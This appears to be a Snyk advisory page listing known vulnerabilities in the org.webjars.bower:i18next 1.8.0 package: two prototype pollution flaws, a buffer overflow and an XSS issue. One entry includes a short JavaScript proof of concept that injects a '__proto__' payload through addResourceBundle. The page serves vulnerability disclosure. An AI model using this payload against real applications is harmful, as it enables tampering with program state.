org.webjars.bower:i18next@1.8.0 vulnerabilities

  • latest version

    8.4.2

  • first published

    9 years ago

  • latest version published

    7 years ago

  • licenses detected

  • package manager

  • Direct Vulnerabilities

    Known vulnerabilities in the org.webjars.bower:i18next package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • H
    Prototype Pollution

    org.webjars.bower:i18next is an internationalization framework for browser or any other javascript environment (eg. node.js).

    Affected versions of this package are vulnerable to Prototype Pollution via getLastOfPath() in i18next.js.

    How to fix Prototype Pollution?

    There is no fixed version for org.webjars.bower:i18next.

    [0,)
    • M
    Prototype Pollution

    org.webjars.bower:i18next is an internationalization framework for browser or any other javascript environment (eg. node.js).

    Affected versions of this package are vulnerable to Prototype Pollution. This vulnerability relates to the AddResourceBundle API which uses the the deepExtend function (https://github.com/i18next/i18next/blob/master/i18next.js#L361-L370) internally to extend existing translations in a file. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.

    PoC

    import i18n from "i18next";
    i18n.init({
        resources: {
          en: {
            namespace1: {
              key: 'hello from namespace 1'
            },
            namespace2: {
              key: 'hello from namespace 2'
            }
          },
          de: {
            namespace1: {
              key: 'hallo von namespace 1'
            },
            namespace2: {
              key: 'hallo von namespace 2'
            }  
          }
        }
      });
    
      var malicious_payload = '{"__proto__":{"vulnerable":"Polluted"}}';
      i18n.init({ resources: {} });
      i18n.addResourceBundle('en', 'namespace1', JSON.parse(malicious_payload)
      ,true,true);
     
     
    console.log(i18n.options.resources);
    //a newly created empty object has the vulnerable property
    console.log({}.vulnerable);
    

    How to fix Prototype Pollution?

    There is no fixed version for org.webjars.bower:i18next.

    [0,)
    • M
    Buffer Overflow

    org.webjars.bower:i18next is an internationalization framework for browser or any other javascript environment (eg. node.js).

    Affected versions of this package are vulnerable to Buffer Overflow. It is possible to cause buffer overflow by changing the translation to be recursive.

    How to fix Buffer Overflow?

    There is no fixed version for org.webjars.bower:i18next.

    [0,)
    • M
    Cross-site Scripting (XSS)

    org.webjars.bower:i18next is an internationalization framework for browser or any other javascript environment (eg. node.js).

    Affected versions of this package are vulnerable to Cross-site Scripting (XSS) due to the interpolation resolution code in translate.js loops over each key in the dictionary and applies replacements one at a time. Along with the unescaped suffix feature in i18next, may allow attackers to use the name of another key in the dictionary to leverage themselves to inject code into the browser.

    How to fix Cross-site Scripting (XSS)?

    Upgrade org.webjars.bower:i18next to version 1.10.3 or higher.

    [,1.10.3)